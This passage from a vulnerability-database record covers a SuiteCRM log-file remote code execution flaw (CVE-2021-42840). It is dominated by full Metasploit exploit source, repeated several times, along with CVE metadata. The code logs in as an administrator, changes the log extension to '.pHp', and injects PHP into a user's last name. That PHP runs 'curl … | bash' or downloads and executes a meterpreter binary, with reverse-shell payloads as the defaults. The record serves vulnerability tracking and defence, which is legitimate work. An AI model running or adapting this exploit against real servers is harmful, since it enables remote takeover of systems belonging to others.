\nend \nend \n \ndef post_log_file(data) \nsend_request_cgi( \n{ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri, 'index.php'), \n'ctype' => \"multipart/form-data; boundary=#{data.bound}\", \n'keep_cookies' => true, \n'headers' => { \n'Referer' => \"#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Configurator&action=EditView\" \n}, \n'data' => data.to_s \n} \n) \nend \n \ndef modify_system_settings_file \nfilename = rand_text_alphanumeric(8).to_s \nextension = '.pHp' \n@php_fname = filename + extension \naction = 'Modify system settings file' \nprint_status(\"Trying - #{action}\") \n \ndata = Rex::MIME::Message.new \ndata.add_part('SaveConfig', nil, nil, 'form-data; name=\"action\"') \ndata.add_part('Configurator', nil, nil, 'form-data; name=\"module\"') \ndata.add_part(filename.to_s, nil, nil, 'form-data; name=\"logger_file_name\"') \ndata.add_part(extension.to_s, nil, nil, 'form-data; name=\"logger_file_ext\"') \ndata.add_part('info', nil, nil, 'form-data; name=\"logger_level\"') \ndata.add_part('Save', nil, nil, 'form-data; name=\"save\"') \n \nres = post_log_file(data) \ncheck_logfile_request(res, action) \nend \n \ndef poison_log_file \naction = 'Poison log file' \nif target.arch.first == 'cmd' \ncommand_injection = \"<?php `curl #{@download_url} | bash`; ?>\" \nelse \n@meterpreter_fname = \"#{datastore['WRITABLEDIR']}/#{rand_text_alphanumeric(8)}\" \ncommand_injection = %( \n<?php `curl #{@download_url} -o #{@meterpreter_fname}; \n/bin/chmod 700 #{@meterpreter_fname}; \n/bin/sh -c #{@meterpreter_fname};`; ?> \n) \nend \n \nprint_status(\"Trying - #{action}\") \n \ndata = Rex::MIME::Message.new \ndata.add_part('Users', nil, nil, 'form-data; name=\"module\"') \ndata.add_part('1', nil, nil, 'form-data; name=\"record\"') \ndata.add_part('Save', nil, nil, 'form-data; name=\"action\"') \ndata.add_part('EditView', nil, nil, 'form-data; name=\"page\"') \ndata.add_part('DetailView', nil, nil, 'form-data; name=\"return_action\"') \ndata.add_part(datastore['USER'], nil, nil, 'form-data; name=\"user_name\"') \ndata.add_part(command_injection, nil, nil, 'form-data; name=\"last_name\"') \n \nres = post_log_file(data) \ncheck_logfile_request(res, action) \nend \n \ndef restore \naction = 'Restore logging to default configuration' \nprint_status(\"Trying - #{action}\") \n \ndata = Rex::MIME::Message.new \ndata.add_part('SaveConfig', nil, nil, 'form-data; name=\"action\"') \ndata.add_part('Configurator', nil, nil, 'form-data; name=\"module\"') \ndata.add_part('suitecrm', nil, nil, 'form-data; name=\"logger_file_name\"') \ndata.add_part('.log', nil, nil, 'form-data; name=\"logger_file_ext\"') \ndata.add_part('fatal', nil, nil, 'form-data; name=\"logger_level\"') \ndata.add_part('Save', nil, nil, 'form-data; name=\"save\"') \n \npost_log_file(data) \n \ndata = Rex::MIME::Message.new \ndata.add_part('Users', nil, nil, 'form-data; name=\"module\"') \ndata.add_part('1', nil, nil, 'form-data; name=\"record\"') \ndata.add_part('Save', nil, nil, 'form-data; name=\"action\"') \ndata.add_part('EditView', nil, nil, 'form-data; name=\"page\"') \ndata.add_part('DetailView', nil, nil, 'form-data; name=\"return_action\"') \ndata.add_part(datastore['USER'], nil, nil, 'form-data; name=\"user_name\"') \ndata.add_part(datastore['LASTNAME'], nil, nil, 'form-data; name=\"last_name\"') \n \nres = post_log_file(data) \n \nprint_error(\"Failed - #{action}\") unless res && res.code == 301 \n \nprint_good(\"Succeeded - #{action}\") \nend \n \ndef check_logfile_request(res, action) \nfail_with(Failure::Unknown, \"#{action} - no reply\") unless res \n \nunless res.code == 301 \nprint_error(\"Failed - #{action}\") \nfail_with(Failure::UnexpectedReply, \"Failed - #{action}\") \nend \n \nprint_good(\"Succeeded - #{action}\") \nend \n \ndef execute_php \nprint_status(\"Executing php code in log file: #{@php_fname}\") \nres = send_request_cgi( \n{ \n'uri' => normalize_uri(target_uri, @php_fname), \n'keep_cookies' => true \n} \n) \nfail_with(Failure::NotFound, \"#{peer} - Not found: #{@php_fname}\") if res && res.code == 404 \nregister_files_for_cleanup(@php_fname) \nregister_files_for_cleanup(@meterpreter_fname) unless @meterpreter_fname.nil? || @meterpreter_fname.empty? \nend \n \ndef on_request_uri(cli, _request) \nsend_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' }) \nprint_good(\"#{peer} - Payload sent!\") \nend \n \ndef start_http_server \nstart_service( \n{ \n'Uri' => { \n'Proc' => proc do |cli, req| \non_request_uri(cli, req) \nend, \n'Path' => resource_uri \n} \n} \n) \n@download_url = get_uri \nend \n \ndef exploit \nstart_http_server \nauthenticate unless @authenticated \nfail_with(Failure::NoAccess, datastore['USER'].to_s) unless @authenticated \nfail_with(Failure::NoAccess, \"#{datastore['USER']} does not have administrative rights!\") unless @is_admin \nmodify_system_settings_file \npoison_log_file \nexecute_php \nensure \nrestore if datastore['RESTORECONF'] \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162975/suitecrm_log_file_rce.rb.txt", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2022-06-24T08:37:26", "description": "This module exploits an input validation error on the log file extension parameter. It does not properly validate upper/lower case characters. Once this occurs, the application log file will be treated as a php file. The log file can then be populated with php code by changing the username of a valid user, as this info is logged. The php code in the file can then be executed by sending an HTTP request to the log file. A similar issue was reported by the same researcher where a blank file extension could be supplied and the extension could be provided in the file name. This exploit will work on those versions as well, and those references are included.\n", "cvss3": {}, "published": "2021-05-22T05:11:19", "type": "metasploit", "title": "SuiteCRM Log File Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-28320"], "modified": "2021-10-23T03:11:51", "id": "MSF:EXPLOIT-LINUX-HTTP-SUITECRM_LOG_FILE_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/suitecrm_log_file_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::CmdStager\n include Msf::Exploit::FileDropper\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'SuiteCRM Log File Remote Code Execution',\n 'Description' => %q{\n This module exploits an input validation error on the log file extension parameter. It does\n not properly validate upper/lower case characters. Once this occurs, the application log file\n will be treated as a php file. The log file can then be populated with php code by changing the\n username of a valid user, as this info is logged. The php code in the file can then be executed\n by sending an HTTP request to the log file. A similar issue was reported by the same researcher\n where a blank file extension could be supplied and the extension could be provided in the file\n name. This exploit will work on those versions as well, and those references are included.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'M. Cory Billington' # @_th3y\n ],\n 'References' => [\n ['CVE', '2021-42840'],\n ['CVE', '2020-28328'], # First CVE\n ['EDB', '49001'], # Previous exploit, this module will cover those versions too. Almost identical issue.\n ['URL', 'https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/'], # First exploit\n ['URL', 'https://theyhack.me/SuiteCRM-RCE-2/'] # This exploit\n ],\n 'Platform' => %w[linux unix],\n 'Arch' => %w[ARCH_X64 ARCH_CMD ARCH_X86],\n 'Targets' => [\n [\n 'Linux (x64)', {\n 'Arch' => ARCH_X64,\n 'Platform' => 'linux',\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'\n }\n }\n ],\n [\n 'Linux (cmd)', {\n 'Arch' => ARCH_CMD,\n 'Platform' => 'unix',\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_bash'\n }\n }\n ]\n ],\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\n 'Reliability' => [REPEATABLE_SESSION]\n },\n 'Privileged' => true,\n 'DisclosureDate' => '2021-04-28',\n 'DefaultTarget' => 0\n )\n )\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to SuiteCRM', '/']),\n OptString.new('USER', [true, 'Username of user with administrative rights', 'admin']),\n OptString.new('PASS', [true, 'Password for administrator', 'admin']),\n OptBool.new('RESTORECONF', [false, 'Restore the configuration file to default after exploit runs', true]),\n OptString.new('WRITABLEDIR', [false, 'Writable directory to stage meterpreter', '/tmp']),\n OptString.new('LASTNAME', [false, 'Admin user last name to clean up profile', 'admin'])\n ]\n )\n end\n\n def check\n authenticate unless @authenticated\n return Exploit::CheckCode::Unknown unless @authenticated\n\n version_check_request = send_request_cgi(\n {\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'keep_cookies' => true,\n 'vars_get' => {\n 'module' => 'Home',\n 'action' => 'About'\n }\n }\n )\n\n return Exploit::CheckCode::Unknown(\"#{peer} - Connection timed out\") unless version_check_request\n\n version_match = version_check_request.body[/\n Version\n \\s\n \\d{1} # Major revision\n \\.\n \\d{1,2} # Minor revision\n \\.\n \\d{1,2} # Bug fix release\n /x]\n\n version = version_match.partition(' ').last\n\n if version.nil? || version.empty?\n about_url = \"#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Home&action=About\"\n return Exploit::CheckCode::Unknown(\"Check #{about_url} to confirm version.\")\n end\n\n patched_version = Rex::Version.new('7.11.18')\n current_version = Rex::Version.new(version)\n\n return Exploit::CheckCode::Appears(\"SuiteCRM #{version}\") if current_version <= patched_version\n\n Exploit::CheckCode::Safe(\"SuiteCRM #{version}\")\n end\n\n def authenticate\n print_status(\"Authenticating as #{datastore['USER']}\")\n initial_req = send_request_cgi(\n {\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri, 'index.php'),\n 'keep_cookies' => true,\n 'vars_get' => {\n 'module' => 'Users',\n 'action' => 'Login'\n }\n }\n )\n\n return false unless initial_req && initial_req.code == 200\n\n login = send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri, 'index.php'),\n 'keep_cookies' => true,\n 'vars_post' => {\n 'module' => 'Users',\n 'action' => 'Authenticate',\n 'return_module' => 'Users',\n 'return_action' => 'Login',\n 'user_name' => datastore['USER'],\n 'username_password' => datastore['PASS'],\n 'Login' => 'Log In'\n }\n }\n )\n\n return false unless login && login.code == 302\n\n res = send_request_cgi(\n {\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri, 'index.php'),\n 'keep_cookies' => true,\n 'vars_get' => {\n 'module' => 'Administration',\n 'action' => 'index'\n }\n }\n )\n\n auth_succeeded?(res)\n end\n\n def auth_succeeded?(res)\n return false unless res\n\n if res.code == 200\n print_good(\"Authenticated as: #{datastore['USER']}\")\n if res.body.include?('Unauthorized access to administration.')\n print_warning(\"#{datastore['USER']} does not have administrative rights! Exploit will fail.\")\n @is_admin = false\n else\n print_good(\"#{datastore['USER']} has administrative rights.\")\n @is_admin = true\n end\n @authenticated = true\n return true\n else\n print_error(\"Failed to authenticate as: #{datastore['USER']}\")\n return false\n end\n end\n\n def post_log_file(data)\n send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri, 'index.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'keep_cookies' => true,\n 'headers' => {\n 'Referer' => \"#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Configurator&action=EditView\"\n },\n 'data' => data.to_s\n }\n )\n end\n\n def modify_system_settings_file\n filename = rand_text_alphanumeric(8).to_s\n extension = '.pHp'\n @php_fname = filename + extension\n action = 'Modify system settings file'\n print_status(\"Trying - #{action}\")\n\n data = Rex::MIME::Message.new\n data.add_part('SaveConfig', nil, nil, 'form-data; name=\"action\"')\n data.add_part('Configurator', nil, nil, 'form-data; name=\"module\"')\n data.add_part(filename.to_s, nil, nil, 'form-data; name=\"logger_file_name\"')\n data.add_part(extension.to_s, nil, nil, 'form-data; name=\"logger_file_ext\"')\n data.add_part('info', nil, nil, 'form-data; name=\"logger_level\"')\n data.add_part('Save', nil, nil, 'form-data; name=\"save\"')\n\n res = post_log_file(data)\n check_logfile_request(res, action)\n end\n\n def poison_log_file\n action = 'Poison log file'\n if target.arch.first == 'cmd'\n command_injection = \"<?php `curl #{@download_url} | bash`; ?>\"\n else\n @meterpreter_fname = \"#{datastore['WRITABLEDIR']}/#{rand_text_alphanumeric(8)}\"\n command_injection = %(\n <?php `curl #{@download_url} -o #{@meterpreter_fname};\n /bin/chmod 700 #{@meterpreter_fname};\n /bin/sh -c #{@meterpreter_fname};`; ?>\n )\n end\n\n print_status(\"Trying - #{action}\")\n\n data = Rex::MIME::Message.new\n data.add_part('Users', nil, nil, 'form-data; name=\"module\"')\n data.add_part('1', nil, nil, 'form-data; name=\"record\"')\n data.add_part('Save', nil, nil, 'form-data; name=\"action\"')\n data.add_part('EditView', nil, nil, 'form-data; name=\"page\"')\n data.add_part('DetailView', nil, nil, 'form-data; name=\"return_action\"')\n data.add_part(datastore['USER'], nil, nil, 'form-data; name=\"user_name\"')\n data.add_part(command_injection, nil, nil, 'form-data; name=\"last_name\"')\n\n res = post_log_file(data)\n check_logfile_request(res, action)\n end\n\n def restore\n action = 'Restore logging to default configuration'\n print_status(\"Trying - #{action}\")\n\n data = Rex::MIME::Message.new\n data.add_part('SaveConfig', nil, nil, 'form-data; name=\"action\"')\n data.add_part('Configurator', nil, nil, 'form-data; name=\"module\"')\n data.add_part('suitecrm', nil, nil, 'form-data; name=\"logger_file_name\"')\n data.add_part('.log', nil, nil, 'form-data; name=\"logger_file_ext\"')\n data.add_part('fatal', nil, nil, 'form-data; name=\"logger_level\"')\n data.add_part('Save', nil, nil, 'form-data; name=\"save\"')\n\n post_log_file(data)\n\n data = Rex::MIME::Message.new\n data.add_part('Users', nil, nil, 'form-data; name=\"module\"')\n data.add_part('1', nil, nil, 'form-data; name=\"record\"')\n data.add_part('Save', nil, nil, 'form-data; name=\"action\"')\n data.add_part('EditView', nil, nil, 'form-data; name=\"page\"')\n data.add_part('DetailView', nil, nil, 'form-data; name=\"return_action\"')\n data.add_part(datastore['USER'], nil, nil, 'form-data; name=\"user_name\"')\n data.add_part(datastore['LASTNAME'], nil, nil, 'form-data; name=\"last_name\"')\n\n res = post_log_file(data)\n\n print_error(\"Failed - #{action}\") unless res && res.code == 301\n\n print_good(\"Succeeded - #{action}\")\n end\n\n def check_logfile_request(res, action)\n fail_with(Failure::Unknown, \"#{action} - no reply\") unless res\n\n unless res.code == 301\n print_error(\"Failed - #{action}\")\n fail_with(Failure::UnexpectedReply, \"Failed - #{action}\")\n end\n\n print_good(\"Succeeded - #{action}\")\n end\n\n def execute_php\n print_status(\"Executing php code in log file: #{@php_fname}\")\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri, @php_fname),\n 'keep_cookies' => true\n }\n )\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{@php_fname}\") if res && res.code == 404\n register_files_for_cleanup(@php_fname)\n register_files_for_cleanup(@meterpreter_fname) unless @meterpreter_fname.nil? || @meterpreter_fname.empty?\n end\n\n def on_request_uri(cli, _request)\n send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })\n print_good(\"#{peer} - Payload sent!\")\n end\n\n def start_http_server\n start_service(\n {\n 'Uri' => {\n 'Proc' => proc do |cli, req|\n on_request_uri(cli, req)\n end,\n 'Path' => resource_uri\n }\n }\n )\n @download_url = get_uri\n end\n\n def exploit\n start_http_server\n authenticate unless @authenticated\n fail_with(Failure::NoAccess, datastore['USER'].to_s) unless @authenticated\n fail_with(Failure::NoAccess, \"#{datastore['USER']} does not have administrative rights!\") unless @is_admin\n modify_system_settings_file\n poison_log_file\n execute_php\n ensure\n restore if datastore['RESTORECONF']\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/suitecrm_log_file_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T17:04:02", "description": "** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: The CNA or individual who requested this candidate did not associate it with any vulnerability during 2020. Notes: none.", "cvss3": {}, "published": "2021-01-26T18:15:00", "type": "cve", "title": "CVE-2020-28320", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2020-28320"], "modified": "2021-01-26T18:15:00", "cpe": [], "id": "CVE-2020-28320", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28320", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}, {"lastseen": "2022-03-23T19:36:23", "description": "SuiteCRM before 7.11.19 allows remote code execution via the system settings Log File Name setting. In certain circumstances involving admin account takeover, logger_file_name can refer to an attacker-controlled PHP file under the web root, because only the all-lowercase PHP file extensions were blocked. NOTE: this issue exists because of an incomplete fix for CVE-2020-28328.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-22T19:15:00", "type": "cve", "title": "CVE-2021-42840", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28328", "CVE-2021-42840"], "modified": "2021-11-30T20:27:00", "cpe": [], "id": "CVE-2021-42840", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-42840", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": []}], "exploitdb": [{"lastseen": "2022-05-13T17:34:25", "description": "", "cvss3": {}, "published": "2021-11-17T00:00:00", "type": "exploitdb", "title": "SuiteCRM 7.11.18 - Remote Code Execution (RCE) (Authenticated) (Metasploit)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["2021-42840", "CVE-2020-28320"], "modified": "2021-11-17T00:00:00", "id": "EDB-ID:50531", "href": "https://www.exploit-db.com/exploits/50531", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::CmdStager\r\n include Msf::Exploit::FileDropper\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'SuiteCRM Log File Remote Code Execution',\r\n 'Description' => %q{\r\n This module exploits an input validation error on the log file extension parameter. It does\r\n not properly validate upper/lower case characters. Once this occurs, the application log file\r\n will be treated as a php file. The log file can then be populated with php code by changing the\r\n username of a valid user, as this info is logged. The php code in the file can then be executed\r\n by sending an HTTP request to the log file. A similar issue was reported by the same researcher\r\n where a blank file extension could be supplied and the extension could be provided in the file\r\n name. This exploit will work on those versions as well, and those references are included.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'M. Cory Billington' # @_th3y\r\n ],\r\n 'References' => [\r\n ['CVE', '2021-42840'],\r\n ['CVE', '2020-28328'], # First CVE\r\n ['EDB', '49001'], # Previous exploit, this module will cover those versions too. Almost identical issue.\r\n ['URL', 'https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/'], # First exploit\r\n ['URL', 'https://theyhack.me/SuiteCRM-RCE-2/'] # This exploit\r\n ],\r\n 'Platform' => %w[linux unix],\r\n 'Arch' => %w[ARCH_X64 ARCH_CMD ARCH_X86],\r\n 'Targets' => [\r\n [\r\n 'Linux (x64)', {\r\n 'Arch' => ARCH_X64,\r\n 'Platform' => 'linux',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'\r\n }\r\n }\r\n ],\r\n [\r\n 'Linux (cmd)', {\r\n 'Arch' => ARCH_CMD,\r\n 'Platform' => 'unix',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/unix/reverse_bash'\r\n }\r\n }\r\n ]\r\n ],\r\n 'Notes' => {\r\n 'Stability' => [CRASH_SAFE],\r\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n },\r\n 'Privileged' => true,\r\n 'DisclosureDate' => '2021-04-28',\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The base path to SuiteCRM', '/']),\r\n OptString.new('USER', [true, 'Username of user with administrative rights', 'admin']),\r\n OptString.new('PASS', [true, 'Password for administrator', 'admin']),\r\n OptBool.new('RESTORECONF', [false, 'Restore the configuration file to default after exploit runs', true]),\r\n OptString.new('WRITABLEDIR', [false, 'Writable directory to stage meterpreter', '/tmp']),\r\n OptString.new('LASTNAME', [false, 'Admin user last name to clean up profile', 'admin'])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n authenticate unless @authenticated\r\n return Exploit::CheckCode::Unknown unless @authenticated\r\n\r\n version_check_request = send_request_cgi(\r\n {\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\r\n 'keep_cookies' => true,\r\n 'vars_get' => {\r\n 'module' => 'Home',\r\n 'action' => 'About'\r\n }\r\n }\r\n )\r\n\r\n return Exploit::CheckCode::Unknown(\"#{peer} - Connection timed out\") unless version_check_request\r\n\r\n version_match = version_check_request.body[/\r\n Version\r\n \\s\r\n \\d{1} # Major revision\r\n \\.\r\n \\d{1,2} # Minor revision\r\n \\.\r\n \\d{1,2} # Bug fix release\r\n /x]\r\n\r\n version = version_match.partition(' ').last\r\n\r\n if version.nil? || version.empty?\r\n about_url = \"#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Home&action=About\"\r\n return Exploit::CheckCode::Unknown(\"Check #{about_url} to confirm version.\")\r\n end\r\n\r\n patched_version = Rex::Version.new('7.11.18')\r\n current_version = Rex::Version.new(version)\r\n\r\n return Exploit::CheckCode::Appears(\"SuiteCRM #{version}\") if current_version <= patched_version\r\n\r\n Exploit::CheckCode::Safe(\"SuiteCRM #{version}\")\r\n end\r\n\r\n def authenticate\r\n print_status(\"Authenticating as #{datastore['USER']}\")\r\n initial_req = send_request_cgi(\r\n {\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri, 'index.php'),\r\n 'keep_cookies' => true,\r\n 'vars_get' => {\r\n 'module' => 'Users',\r\n 'action' => 'Login'\r\n }\r\n }\r\n )\r\n\r\n return false unless initial_req && initial_req.code == 200\r\n\r\n login = send_request_cgi(\r\n {\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri, 'index.php'),\r\n 'keep_cookies' => true,\r\n 'vars_post' => {\r\n 'module' => 'Users',\r\n 'action' => 'Authenticate',\r\n 'return_module' => 'Users',\r\n 'return_action' => 'Login',\r\n 'user_name' => datastore['USER'],\r\n 'username_password' => datastore['PASS'],\r\n 'Login' => 'Log In'\r\n }\r\n }\r\n )\r\n\r\n return false unless login && login.code == 302\r\n\r\n res = send_request_cgi(\r\n {\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri, 'index.php'),\r\n 'keep_cookies' => true,\r\n 'vars_get' => {\r\n 'module' => 'Administration',\r\n 'action' => 'index'\r\n }\r\n }\r\n )\r\n\r\n auth_succeeded?(res)\r\n end\r\n\r\n def auth_succeeded?(res)\r\n return false unless res\r\n\r\n if res.code == 200\r\n print_good(\"Authenticated as: #{datastore['USER']}\")\r\n if res.body.include?('Unauthorized access to administration.')\r\n print_warning(\"#{datastore['USER']} does not have administrative rights! Exploit will fail.\")\r\n @is_admin = false\r\n else\r\n print_good(\"#{datastore['USER']} has administrative rights.\")\r\n @is_admin = true\r\n end\r\n @authenticated = true\r\n return true\r\n else\r\n print_error(\"Failed to authenticate as: #{datastore['USER']}\")\r\n return false\r\n end\r\n end\r\n\r\n def post_log_file(data)\r\n send_request_cgi(\r\n {\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri, 'index.php'),\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'keep_cookies' => true,\r\n 'headers' => {\r\n 'Referer' => \"#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Configurator&action=EditView\"\r\n },\r\n 'data' => data.to_s\r\n }\r\n )\r\n end\r\n\r\n def modify_system_settings_file\r\n filename = rand_text_alphanumeric(8).to_s\r\n extension = '.pHp'\r\n @php_fname = filename + extension\r\n action = 'Modify system settings file'\r\n print_status(\"Trying - #{action}\")\r\n\r\n data = Rex::MIME::Message.new\r\n data.add_part('SaveConfig', nil, nil, 'form-data; name=\"action\"')\r\n data.add_part('Configurator', nil, nil, 'form-data; name=\"module\"')\r\n data.add_part(filename.to_s, nil, nil, 'form-data; name=\"logger_file_name\"')\r\n data.add_part(extension.to_s, nil, nil, 'form-data; name=\"logger_file_ext\"')\r\n data.add_part('info', nil, nil, 'form-data; name=\"logger_level\"')\r\n data.add_part('Save', nil, nil, 'form-data; name=\"save\"')\r\n\r\n res = post_log_file(data)\r\n check_logfile_request(res, action)\r\n end\r\n\r\n def poison_log_file\r\n action = 'Poison log file'\r\n if target.arch.first == 'cmd'\r\n command_injection = \"<?php `curl #{@download_url} | bash`; ?>\"\r\n else\r\n @meterpreter_fname = \"#{datastore['WRITABLEDIR']}/#{rand_text_alphanumeric(8)}\"\r\n command_injection = %(\r\n <?php `curl #{@download_url} -o #{@meterpreter_fname};\r\n /bin/chmod 700 #{@meterpreter_fname};\r\n /bin/sh -c #{@meterpreter_fname};`; ?>\r\n )\r\n end\r\n\r\n print_status(\"Trying - #{action}\")\r\n\r\n data = Rex::MIME::Message.new\r\n data.add_part('Users', nil, nil, 'form-data; name=\"module\"')\r\n data.add_part('1', nil, nil, 'form-data; name=\"record\"')\r\n data.add_part('Save', nil, nil, 'form-data; name=\"action\"')\r\n data.add_part('EditView', nil, nil, 'form-data; name=\"page\"')\r\n data.add_part('DetailView', nil, nil, 'form-data; name=\"return_action\"')\r\n data.add_part(datastore['USER'], nil, nil, 'form-data; name=\"user_name\"')\r\n data.add_part(command_injection, nil, nil, 'form-data; name=\"last_name\"')\r\n\r\n res = post_log_file(data)\r\n check_logfile_request(res, action)\r\n end\r\n\r\n def restore\r\n action = 'Restore logging to default configuration'\r\n print_status(\"Trying - #{action}\")\r\n\r\n data = Rex::MIME::Message.new\r\n data.add_part('SaveConfig', nil, nil, 'form-data; name=\"action\"')\r\n data.add_part('Configurator', nil, nil, 'form-data; name=\"module\"')\r\n data.add_part('suitecrm', nil, nil, 'form-data; name=\"logger_file_name\"')\r\n data.add_part('.log', nil, nil, 'form-data; name=\"logger_file_ext\"')\r\n data.add_part('fatal', nil, nil, 'form-data; name=\"logger_level\"')\r\n data.add_part('Save', nil, nil, 'form-data; name=\"save\"')\r\n\r\n post_log_file(data)\r\n\r\n data = Rex::MIME::Message.new\r\n data.add_part('Users', nil, nil, 'form-data; name=\"module\"')\r\n data.add_part('1', nil, nil, 'form-data; name=\"record\"')\r\n data.add_part('Save', nil, nil, 'form-data; name=\"action\"')\r\n data.add_part('EditView', nil, nil, 'form-data; name=\"page\"')\r\n data.add_part('DetailView', nil, nil, 'form-data; name=\"return_action\"')\r\n data.add_part(datastore['USER'], nil, nil, 'form-data; name=\"user_name\"')\r\n data.add_part(datastore['LASTNAME'], nil, nil, 'form-data; name=\"last_name\"')\r\n\r\n res = post_log_file(data)\r\n\r\n print_error(\"Failed - #{action}\") unless res && res.code == 301\r\n\r\n print_good(\"Succeeded - #{action}\")\r\n end\r\n\r\n def check_logfile_request(res, action)\r\n fail_with(Failure::Unknown, \"#{action} - no reply\") unless res\r\n\r\n unless res.code == 301\r\n print_error(\"Failed - #{action}\")\r\n fail_with(Failure::UnexpectedReply, \"Failed - #{action}\")\r\n end\r\n\r\n print_good(\"Succeeded - #{action}\")\r\n end\r\n\r\n def execute_php\r\n print_status(\"Executing php code in log file: #{@php_fname}\")\r\n res = send_request_cgi(\r\n {\r\n 'uri' => normalize_uri(target_uri, @php_fname),\r\n 'keep_cookies' => true\r\n }\r\n )\r\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{@php_fname}\") if res && res.code == 404\r\n register_files_for_cleanup(@php_fname)\r\n register_files_for_cleanup(@meterpreter_fname) unless @meterpreter_fname.nil? || @meterpreter_fname.empty?\r\n end\r\n\r\n def on_request_uri(cli, _request)\r\n send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })\r\n print_good(\"#{peer} - Payload sent!\")\r\n end\r\n\r\n def start_http_server\r\n start_service(\r\n {\r\n 'Uri' => {\r\n 'Proc' => proc do |cli, req|\r\n on_request_uri(cli, req)\r\n end,\r\n 'Path' => resource_uri\r\n }\r\n }\r\n )\r\n @download_url = get_uri\r\n end\r\n\r\n def exploit\r\n start_http_server\r\n authenticate unless @authenticated\r\n 